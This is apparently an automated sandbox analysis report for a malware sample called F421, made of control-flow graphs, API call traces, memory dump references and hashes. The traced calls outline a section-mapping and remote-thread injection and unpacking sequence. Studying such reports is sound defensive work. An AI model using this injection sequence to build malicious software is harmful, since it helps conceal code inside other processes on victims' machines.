                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040179E
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017C0
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                              • Instruction ID: 9e1831f0ceb5ee828940fa86c31e9463c4dc41faf1b0eb7057c6f8c584aa9f8c
                                                              • Opcode Fuzzy Hash: a951ce0e9a9537201a4ab380c462e1ce4e6ed323a6f782408602592e2a1882ae
                                                              • Instruction Fuzzy Hash: 2A5109B5900249BFEF208F91CC48FEFBBB8EF86B00F104159F911AA2A5D7719945CB64

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 389 403103-403127 390 403246-40324b 389->390 391 40312d-403145 389->391 391->390 392 40314b-40315c 391->392 393 40315e-403167 392->393 394 40316c-40317a 393->394 394->394 395 40317c-403183 394->395 396 4031a5-4031ac 395->396 397 403185-4031a4 395->397 398 4031ce-4031d1 396->398 399 4031ae-4031cd 396->399 397->396 400 4031d3-4031d6 398->400 401 4031da 398->401 399->398 400->401 402 4031d8 400->402 401->393 403 4031dc-4031e1 401->403 402->403 403->390 404 4031e3-4031e6 403->404 404->390 405 4031e8-403243 RtlCreateUserThread NtTerminateProcess 404->405 405->390
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: CreateProcessTerminateThreadUser
                                                              • String ID:
                                                              • API String ID: 1921587553-0
                                                              • Opcode ID: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                              • Instruction ID: dae095e867f3745097cc185a7748a697303a2d44691d7cc8a0ebaf8866640ae2
                                                              • Opcode Fuzzy Hash: ba71293914487d9c4508611429cc1c96d45b5da92adc1af413e838efc5e3ffef
                                                              • Instruction Fuzzy Hash: BB415832618E0C8FD768EE6CA8896A377D6E798351B1643BAD808D7384EE30D85183C5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 407 403257-40325f 408 4031f0-403243 RtlCreateUserThread NtTerminateProcess 407->408 409 403261-40327f 407->409 410 403246-40324b 408->410 415 403281 409->415 416 403286-403290 409->416 415->416 419 403283-403285 415->419 417 403292 416->417 418 403298-4032ba call 4012ec 416->418 417->418 420 403293-403297 417->420 425 4032be 418->425 419->416 425->425
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: CreateProcessTerminateThreadUser
                                                              • String ID:
                                                              • API String ID: 1921587553-0
                                                              • Opcode ID: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                              • Instruction ID: ab58b7d6b66510dde6bc1fc7e766791280fd84229bd7d6ef16cc780df24ac814
                                                              • Opcode Fuzzy Hash: 8f75c49c67d658a2c62e27a3415f0efa1266b4aad096af7960056c4103048e13
                                                              • Instruction Fuzzy Hash: FC1156B181C6448FE714DF78A44A23A7FE4E754326F2407BFD446E12D1D63C8246824B

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 65 2cb003c-2cb0047 66 2cb0049 65->66 67 2cb004c-2cb0263 call 2cb0a3f call 2cb0e0f call 2cb0d90 VirtualAlloc 65->67 66->67 82 2cb028b-2cb0292 67->82 83 2cb0265-2cb0289 call 2cb0a69 67->83 84 2cb02a1-2cb02b0 82->84 86 2cb02ce-2cb03c2 VirtualProtect call 2cb0cce call 2cb0ce7 83->86 84->86 87 2cb02b2-2cb02cc 84->87 94 2cb03d1-2cb03e0 86->94 87->84 95 2cb0439-2cb04b8 VirtualFree 94->95 96 2cb03e2-2cb0437 call 2cb0ce7 94->96 98 2cb04be-2cb04cd 95->98 99 2cb05f4-2cb05fe 95->99 96->94 100 2cb04d3-2cb04dd 98->100 101 2cb077f-2cb0789 99->101 102 2cb0604-2cb060d 99->102 100->99 104 2cb04e3-2cb0505 100->104 105 2cb078b-2cb07a3 101->105 106 2cb07a6-2cb07b0 101->106 102->101 107 2cb0613-2cb0637 102->107 116 2cb0517-2cb0520 104->116 117 2cb0507-2cb0515 104->117 105->106 109 2cb086e-2cb08be LoadLibraryA 106->109 110 2cb07b6-2cb07cb 106->110 111 2cb063e-2cb0648 107->111 115 2cb08c7-2cb08f9 109->115 113 2cb07d2-2cb07d5 110->113 111->101 114 2cb064e-2cb065a 111->114 118 2cb07d7-2cb07e0 113->118 119 2cb0824-2cb0833 113->119 114->101 120 2cb0660-2cb066a 114->120 121 2cb08fb-2cb0901 115->121 122 2cb0902-2cb091d 115->122 123 2cb0526-2cb0547 116->123 117->123 124 2cb07e2 118->124 125 2cb07e4-2cb0822 118->125 127 2cb0839-2cb083c 119->127 126 2cb067a-2cb0689 120->126 121->122 128 2cb054d-2cb0550 123->128 124->119 125->113 129 2cb068f-2cb06b2 126->129 130 2cb0750-2cb077a 126->130 127->109 131 2cb083e-2cb0847 127->131 133 2cb05e0-2cb05ef 128->133 134 2cb0556-2cb056b 128->134 135 2cb06ef-2cb06fc 129->135 136 2cb06b4-2cb06ed 129->136 130->111 137 2cb084b-2cb086c 131->137 138 2cb0849 131->138 133->100 139 2cb056f-2cb057a 134->139 140 2cb056d 134->140 141 2cb074b 135->141 142 2cb06fe-2cb0748 135->142 136->135 137->127 138->109 144 2cb059b-2cb05bb 139->144 145 2cb057c-2cb0599 139->145 140->133 141->126 142->141 149 2cb05bd-2cb05db 144->149 145->149 149->128
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02CB024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2cb0000_F421.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: cf7339fcc9830ce15fc99d41795d567bf203f76d7c6899e1791ff3b9f3428347
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction Fuzzy Hash: E9527974A01229DFDB65CF68C984BADBBB1BF09304F1480D9E94DAB351DB30AA85DF14

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 388 415440-415580 GetModuleHandleW GetProcAddress VirtualProtect
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(02B17CE0), ref: 0041551F
                                                              • GetProcAddress.KERNEL32(00000000,00419CC8), ref: 0041555C
                                                              • VirtualProtect.KERNELBASE(02B17B24,02B17CDC,00000040,?), ref: 0041557B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_F421.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-3916222277
                                                              • Opcode ID: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
                                                              • Instruction ID: e4fb223d50131012075ae1e13ab3c59e5b4ef3b604d21eb0d0e12d9e3e0b2718
                                                              • Opcode Fuzzy Hash: 116f1aac112c905ec162d7070cd71efd76129b0df4f3260cda570b903644e0cb
                                                              • Instruction Fuzzy Hash: C0312310958380CAF301CB78F8147927FE2BB25744F449479D188873A5EFBA5924D7EE

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 426 2daa793-2daa7ac 427 2daa7ae-2daa7b0 426->427 428 2daa7b2 427->428 429 2daa7b7-2daa7c3 CreateToolhelp32Snapshot 427->429 428->429 430 2daa7d3-2daa7e0 Module32First 429->430 431 2daa7c5-2daa7cb 429->431 432 2daa7e9-2daa7f1 430->432 433 2daa7e2-2daa7e3 call 2daa452 430->433 431->430 436 2daa7cd-2daa7d1 431->436 437 2daa7e8 433->437 436->427 436->430 437->432
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02DAA7BB
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02DAA7DB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DA7000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2da7000_F421.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: 97f71007b6daa183c91bf6dc0888521aa7040599355ed1e322b2ca69039cd176
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: 10F096361007116FD7203BF99CACF6F76FCAF49624F100629E646915C0DB70EC45CA61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 439 2cb0e0f-2cb0e24 SetErrorMode * 2 440 2cb0e2b-2cb0e2c 439->440 441 2cb0e26 439->441 441->440
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02CB0223,?,?), ref: 02CB0E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02CB0223,?,?), ref: 02CB0E1E
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2354367271.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2cb0000_F421.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction ID: fdadc0463ad45a6f1627bb6a21ce9283ece9353430d24b8cd761bb0491863ca9
                                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                              • Instruction Fuzzy Hash: A9D01236245228B7DB012A94DC09BCEBB1CDF09BA6F008021FB0DE9080CBB09A4046EA

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 442 4019c0-4019c6 443 4019e7-401a10 442->443 444 4019c8-4019dd call 40127e 442->444 452 401a13-401a46 call 40127e Sleep call 4014fb 443->452 453 401a09-401a0c 443->453 461 401a55-401a5b 452->461 462 401a48-401a50 call 4015fb 452->462 453->452 465 401a60-401a65 461->465 466 401a69 461->466 462->461 467 401a6c-401a9a call 40127e 465->467 466->465 466->467
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                              • Instruction ID: 8602aea7765920f14b43c6808a0d2033de268e003b0f0e4b19403496b7ccbc2b
                                                              • Opcode Fuzzy Hash: 7f12bac4f1dd78845df68974ec1d6207e79698338a7a17bde6cb34e1bb9e829b
                                                              • Instruction Fuzzy Hash: 2B11CE3230A205EADB005AD9A941FBB32199B40754F3041B7B603B90F1953D8913BF2F

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 476 4019e0-401a10 482 401a13-401a46 call 40127e Sleep call 4014fb 476->482 483 401a09-401a0c 476->483 491 401a55-401a5b 482->491 492 401a48-401a50 call 4015fb 482->492 483->482 495 401a60-401a65 491->495 496 401a69 491->496 492->491 497 401a6c-401a9a call 40127e 495->497 496->495 496->497
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                              • Instruction ID: 6e8e83dbc6cb5325300a6df4c81bf03677ed1736eef4dabc06710691df282c78
                                                              • Opcode Fuzzy Hash: e17e85e8ed8125533f7e2167abb1cbc7a5f98fbf5ea5e47149eeb4735b4555ca
                                                              • Instruction Fuzzy Hash: FA016D3230A209EADB005AD8AD41E7B3229AB40754F3001B7BA03790F1953D99137F2F
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                              • Instruction ID: 2b2adc88e5ab551374836522510027b0c35959e32ac3f93f20a40eb2707c2e9b
                                                              • Opcode Fuzzy Hash: d20dd15212e55eeb93c2ba4d893d672a11c9591f500a1070bb8e30cefc0e7994
                                                              • Instruction Fuzzy Hash: C2014C3230A205EBDB009AD4ED41B6A3269AB44714F3041B7BA13B91F1D53D9A537F2B
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                              • Instruction ID: 8da435b4ef065fa937355dde1d01ef47451206c1f83fca999a74837282515cb4
                                                              • Opcode Fuzzy Hash: 6956420fd1a0da5a043187b5517324543cb26d58a43067072202fc2494389932
                                                              • Instruction Fuzzy Hash: 8B01363630A209EADB005AD8AD41EBA22559B44314F3042B7BA13B91F5D53D8A137F2F
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                              • Instruction ID: da9cf87a9ed9cba2a5618582a19ce6b128e8deecbf4ee8231104359b1f28a93a
                                                              • Opcode Fuzzy Hash: 470eaab1d85efef32b59b6b80de91dfe5f43d1552a0586931a32e3bd1b407b26
                                                              • Instruction Fuzzy Hash: 4601863230A209EADB005AD49D41FBA22199B44714F3041B7BA13B90F1D53D8A137F2F
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DAA4A3
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2354648687.0000000002DA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DA7000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_2da7000_F421.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction ID: 4faa677c2626137f1b67ae4e893219315d375f339de73c97cc3e7e00c05bdc10
                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                              • Instruction Fuzzy Hash: 91112B79A00208EFDB01DF98CA95E99BBF5EF08351F0580A4F9489B361D371EA50EF90
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                              • Instruction ID: ef4a3633df93866afb86b86826f27a476d683f03040323dac8a7d7c578d0eba4
                                                              • Opcode Fuzzy Hash: 47584117f720a46a046c478722b1e9804fa2bdf0c34a1eb8c3916f7c7194f890
                                                              • Instruction Fuzzy Hash: 17F04432309206EBDB01AAD4DD41FAA3229AB44354F3041B7BA13B90F1D53C86127F2B
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A31
                                                                • Part of subcall function 004015FB: NtDuplicateObject.NTDLL(00000000,000000FF,000000FF,?,00000000,00000000,00000002,?,00000079), ref: 004016BE
                                                                • Part of subcall function 004015FB: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000,?,00000079), ref: 004016EB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              • Opcode ID: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                              • Instruction ID: 08c596e776171f083f15ab2e9130eea247f108212a51f0ba4fb69116c36cf548
                                                              • Opcode Fuzzy Hash: e9f1e890604c892da627bf4dac1adaaf6327a8231f252b78f611ae96bce34966
                                                              • Instruction Fuzzy Hash: 4BF0FF3230A209EADB005AD59D51EAA26699B44354F3041B7BA13B90F1D53D8A137F2B
                                                              APIs
                                                              • LocalAlloc.KERNELBASE(00000000,02B17CDC,00415A8D), ref: 00415418
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_F421.jbxd
                                                              Similarity
                                                              • API ID: AllocLocal
                                                              • String ID:
                                                              • API String ID: 3494564517-0
                                                              • Opcode ID: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
                                                              • Instruction ID: 6131ea327b8c01d7d03da24dd51081d073e1987c8407c645eead08220222526f
                                                              • Opcode Fuzzy Hash: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
                                                              • Instruction Fuzzy Hash: 36B092B09822009FE200CB50E804B117BA8A308242F404450F505C3140DF205810AA14
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352940560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_F421.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                              • Instruction ID: 6725721ff3489d431dd836171e340eb16c8ebd58ca09b28f7b875ac3b9798d56
                                                              • Opcode Fuzzy Hash: 39ba6718c5b4acb6fcb90013f1bab96879de86035533205ab17ba445abaee414
                                                              • Instruction Fuzzy Hash: 43F0273A30669697DB135E7CD0009CCFF10FD6B6207B88BD2D0C09A141C222845BCB90
                                                              APIs
                                                              • BuildCommDCBA.KERNEL32(00000000,?), ref: 0041563D
                                                              • WritePrivateProfileStringA.KERNEL32(00417380,0041734C,00417328,00417314), ref: 00415661
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415669
                                                              • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004156B1
                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 004156C0
                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004156D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_F421.jbxd
                                                              Similarity
                                                              • API ID: BuildCalendarCommEnvironmentFreeInfoNameObjectOpenPathPrivateProfileShortStringStringsWrite
                                                              • String ID: -
                                                              • API String ID: 1791614364-2547889144
                                                              • Opcode ID: 88fe81dbf2d2a4479fbbfd614abe983f9694fc7ccc8258a604b0f67acac7be9b
                                                              • Instruction ID: 327a1d9486ecdfb24dc002fa9ea073514ce32c0532a3afa617439fefb1992a41
                                                              • Opcode Fuzzy Hash: 88fe81dbf2d2a4479fbbfd614abe983f9694fc7ccc8258a604b0f67acac7be9b
                                                              • Instruction Fuzzy Hash: 7E210830A84304EBD7509F54DC46FD97BB4EB48711F9280A5FA4DAA1C0CE7859C49BDD
                                                              APIs
                                                              • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004156B1
                                                              • OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 004156C0
                                                              • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 004156D1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_F421.jbxd
                                                              Similarity
                                                              • API ID: CalendarInfoNameObjectOpenPathShort
                                                              • String ID: -
                                                              • API String ID: 2381848886-2547889144
                                                              • Opcode ID: 466851c8a0054e7edbf17a091432d8a9fee8f66fccbcc732fb0e0e7a252ed25a
                                                              • Instruction ID: 7e98e6f74bb160639cfe8ebb3c1cacb5dac1db98f22b652a1399afec41121bf8
                                                              • Opcode Fuzzy Hash: 466851c8a0054e7edbf17a091432d8a9fee8f66fccbcc732fb0e0e7a252ed25a
                                                              • Instruction Fuzzy Hash: 2601F431A84344DADB708F509C82BD97BA4FB48325F924199FA8C6F1C0CEB519C4DBC9
                                                              APIs
                                                              • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415744
                                                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041575F
                                                              • HeapDestroy.KERNEL32(00000000), ref: 0041577E
                                                              • GetNumaProcessorNode.KERNEL32(00000000,00000000), ref: 00415788
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2352968927.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_40b000_F421.jbxd
                                                              Similarity
                                                              • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                              • String ID:
                                                              • API String ID: 4159173863-0
                                                              • Opcode ID: a7acaef5ee7e24d6bb35c7ac29c9eac0636e6f05b45e14591ab1bbd8ad3298a8
                                                              • Instruction ID: 75f5f447a75e1158ec7b8286dcbe49327f873da7596033eeb3f7384675a4dd99
                                                              • Opcode Fuzzy Hash: a7acaef5ee7e24d6bb35c7ac29c9eac0636e6f05b45e14591ab1bbd8ad3298a8
                                                              • Instruction Fuzzy Hash: C301A771A80108DFE750EBA4EC86BDA77A8A70C346F814036F605D72C0EF7459448B99

                                                              Execution Graph

                                                              Execution Coverage:11.9%
                                                              Dynamic/Decrypted Code Coverage:15.7%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:178
                                                              Total number of Limit Nodes:7
                                                              execution_graph 3145 4019c0 3146 4019c8 3145->3146 3147 4019e7 3145->3147 3148 401a29 Sleep 3147->3148 3149 4014fb HeapCreate 3148->3149 3150 401a44 3149->3150 3151 4015fb 7 API calls 3150->3151 3152 401a55 3150->3152 3151->3152 3112 402f42 3114 402f18 3112->3114 3113 4019e0 9 API calls 3115 40304f 3113->3115 3114->3113 3114->3115 3132 403103 3133 403246 3132->3133 3134 40312d 3132->3134 3134->3133 3135 4031f0 RtlCreateUserThread NtTerminateProcess 3134->3135 3135->3133 3036 401a04 3037 401a13 3036->3037 3038 401a29 Sleep 3037->3038 3039 4014fb HeapCreate 3038->3039 3040 401a44 3039->3040 3042 401a55 3040->3042 3043 4015fb 3040->3043 3044 40160b 3043->3044 3045 4016af NtDuplicateObject 3044->3045 3054 4017cb 3044->3054 3046 4016cc NtCreateSection 3045->3046 3045->3054 3047 4016f2 NtMapViewOfSection 3046->3047 3048 40174c NtCreateSection 3046->3048 3047->3048 3049 401715 NtMapViewOfSection 3047->3049 3050 401778 3048->3050 3048->3054 3049->3048 3051 401733 3049->3051 3052 401782 NtMapViewOfSection 3050->3052 3050->3054 3051->3048 3053 4017a9 NtMapViewOfSection 3052->3053 3052->3054 3053->3054 3054->3042 3116 401544 3117 401545 3116->3117 3118 4015ea 3117->3118 3119 40152f HeapCreate 3117->3119 3127 40161c 3117->3127 3120 4016af NtDuplicateObject 3121 4016cc NtCreateSection 3120->3121 3131 4017cb 3120->3131 3122 4016f2 NtMapViewOfSection 3121->3122 3123 40174c NtCreateSection 3121->3123 3122->3123 3125 401715 NtMapViewOfSection 3122->3125 3126 401778 3123->3126 3123->3131 3125->3123 3128 401733 3125->3128 3129 401782 NtMapViewOfSection 3126->3129 3126->3131 3127->3120 3127->3131 3128->3123 3130 4017a9 NtMapViewOfSection 3129->3130 3129->3131 3130->3131 2982 2ba003c 2983 2ba0049 2982->2983 2995 2ba0e0f SetErrorMode SetErrorMode 2983->2995 2988 2ba0265 2989 2ba02ce VirtualProtect 